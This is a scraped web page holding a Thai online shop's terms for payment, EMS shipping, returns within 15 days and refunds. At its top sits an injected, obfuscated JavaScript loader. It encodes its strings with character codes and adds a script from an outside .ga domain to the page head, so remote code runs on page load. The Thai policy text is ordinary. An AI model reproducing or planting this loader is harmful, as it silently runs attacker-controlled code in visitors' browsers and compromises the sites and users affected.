Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); Terms and Conditions - Y43
  • Terms-and-Conditions

เงื่อนไขการชำระค่าสินค้า และค่าขนส่ง

  1. หลังจากเราได้รับคำสั่งซื้อ ลูกค้าจะได้รับการยืนยันการสั่งซื้อจากเราทางอีเมล
  2. สินค้าจะถูกส่งโดย EMS ภายใน 48 ชั่วโมง และลูกค้าจะได้รับ tracking no. เพื่อตรวจสอบทางอีเมล (เว้นแต่สินค้าหมดสต็อก เราจะแจ้งให้ลูกค้าทราบทันที)
  3. สินค้าจะถูกส่งให้ลูกค้า เมื่อเราได้รับการโอนเงินแล้วเท่านั้น
  4. การคืนสินค้า หากประสงค์จะส่งคืนสินค้า กรุณาส่งคืนภายใน 15 วัน หลังจากวันรับสินค้า  และสินค้านั้นจะต้องอยู่ในสภาพเดิมทุกประการ โดยลูกค้าเป็นผู้ชำระค่าขนส่งสินค้าคืนทั้งหมด (หากเกิน 15 วันหลังจากวันรับสินค้าไปแล้ว ถือว่าลูกค้าสละสิทธิ์การคืนสินค้านั้น)
  5. การคืนเงินให้ลูกค้า หลังจากเราได้รับสินค้าคืนและทำการตรวจสอบสินค้าอยู่ในสภาพเดิมแล้ว ลูกค้าจะได้รับโอนเงินค่าสินค้าคืนภายใน 7 วันทำการ